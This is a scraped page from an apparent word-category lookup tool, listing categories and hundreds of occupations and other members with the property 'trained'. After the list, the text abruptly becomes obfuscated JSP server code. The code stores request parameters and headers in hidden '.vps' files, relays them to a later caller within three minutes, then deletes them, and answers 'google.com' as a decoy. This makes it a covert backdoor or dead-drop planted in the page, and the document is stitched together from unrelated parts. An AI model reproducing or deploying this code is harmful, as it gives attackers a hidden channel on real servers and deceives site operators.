Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
special_population
with nuance
trained
:
trained:clientele,
Simple categories matching
trained
:
staff,
professional,
dentist,
employee,
individual,
advocate,
artist,
doctor,
people,
woman,
worker,
group,
specialist,
person,
intellectual,
clientele,
researcher,
adviser,
interpreter,
personnel,
unit,
adult,
scientist,
user,
observer,
mediator,
agent,
expert,
technician,
practitioner,
educator,
operator,
physician,
works,
animal,
troops,
therapist,
volunteer,
supervisor,
Members with property
trained
:
physicist,
nurse,
occupational_therapist,
naturalist,
doctor,
gastroenterologist,
physician,
dentist,
pain_specialist,
lawyer,
physical_therapist,
football_referee,
psychiatrist,
gps,
professional_counselor,
caster,
pastor,
solicitor,
skin-care_specialist,
mediator,
nursing_supervisor,
expedition,
dietitian,
cleaner,
counsellor,
radiologist,
oral_surgeon,
taliban,
air_marshall,
consultant,
clinical_psychologist,
engineer,
teacher,
school_nurse,
neurologist,
professional_dermatologist,
physiotherapist,
voice_scientist,
attorney,
medical_assistant,
aesthetician,
clinic_staff,
appellate_specialist,
accountant,
orthopaedist,
child_therapist,
hair_professional,
musicologist,
economist,
member,
person,
vocational_counselor,
school_counselor,
military_pilot,
icu,
obstetrician,
paramedic,
machine_repairer,
harbor_officer,
chemical_supplier,
investigator,
management,
phonetician,
family,
electrical_engineer,
architectural_historian,
medical_doctor,
retired_jurist,
town,
reproductive_endocrinologist,
addiction_counselor,
adolescent_psychiatrist,
orthopedist,
clinician,
machinist,
vendor,
boat_technician,
practitioner,
council_officer,
pathologist,
chef,
user,
animator,
gp,
veterinarian,
executive,
animal,
clinical_pharmacist,
legal_secretary,
financial_expert,
judge_mediator,
ox,
student,
equipment_operator,
friend,
special_educator,
airborne_troops,
welder,
tax_attorney,
cosmetic_dentist,
orthopedic_surgeon,
botanist,
paleontologist,
ptsd_counselor,
osteopath,
educational_diagnostician,
hearing-aid_dispenser,
opinion_leaders,
reporter,
specialist_worker,
x-ray_technician,
pastoral_counselor,
communication_coach,
anesthesiologist,
anthropologist,
midwife,
holistic_veterinarian,
property_surveyor,
appraiser,
museum_director,
gynecologist,
taxpayer_advocate,
electronic_expert,
manager,
policeman,
evacuation,
doctor_lawyer,
child_specialist,
musician,
astronomer,
educationist,
psychiatric_nurse,
physician_assistant,
caseworker,
registered-nurse_rn,
business_attorney,
usability_expert,
community_volunteer,
militia,
athletic_trainer,
marketing_staff,
firefighter,
mechanics,
industrial_hygienist,
professor,
family_counselor,
primary-care_physician,
pilot,
college_counselor,
qualified_coach,
builder,
warehouseman,
pediatrician,
computer_operator,
commando,
paralegal,
holistic_physician,
financial_consultant,
computer_specialist,
technician,
pressure_welder,
database_administrator,
advisor,
laboratory_technician,
craftsman,
family_counsellor,
clinical_officer,
sportsman,
sociologist,
geologist,
quality-control_personnel,
inspector,
surgeon,
ministry,
caregiver,
educational_psychologist,
vendor_trainer,
family_advocate,
researcher,
astronaut,
specialist,
cavalry_scout,
financial_advisor,
gi_professional,
minister,
financial_planner,
special-education_teacher,
psychotherapist,
coach,
prison_troops,
dog,
dental_hygienist,
ranger,
secretary,
therapist,
metalworker,
police,
speech_pathologist,
podiatrist,
civil_engineer,
guidance_counselor,
periodontist,
chemist,
priest,
rectal_surgeon,
nurse_aide,
professional_mediator,
dermatologist,
psychiatric_technician,
statistician,
electrician,
mental-health_nurse,
massage_therapist,
lawyer_mediator,
foreman,
specialist_nurse,
health_visitor,
hygienist,
risk,
geneticist,
aquatic_veterinarian,
driver,
skilled_technician,
surveyor,
undergraduate_student,
laundry_service,
code_inspector,
father,
psychologist,
paediatrician,
farmer,
cytologist,
occupational_hygienist,
counselor,
social_worker,
chiropractor,
orthopedic_specialist,
plaintiff,
rescue_team,
field_inspector,
endurance_runner,
clinical_specialist,
athlete_coach,
community,
supervisor,
department-store_manager,
medical_personnel,
star,
master_technician,
rn,
course_director,
medical_team,
guidance_counsellor,
cultural_anthropologist,
social_psychologist,
tax_accountant,
family_member,
special_population,
throat_specialist,
otolaryngologist,
family_therapist,
psychiatry_registrar,
licensed_electrician,
respiratory_therapist,
ward_staff,
tax_lawyer,
nursing_staff,
mule,
architect,
perinatologist,
ecologist,
mill_worker,
contractor,
horse,
military_police,
athlete,
clinical_physician,
cabinet_maker,
plumber,
judge,
project_manager,
video_editor,
pharmacist,
guardian,
elite_cyclist,
soldier,
life_coach,
scientist,
software_developer,
crisis-intervention_specialist,
health_provider,
orthodontist,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>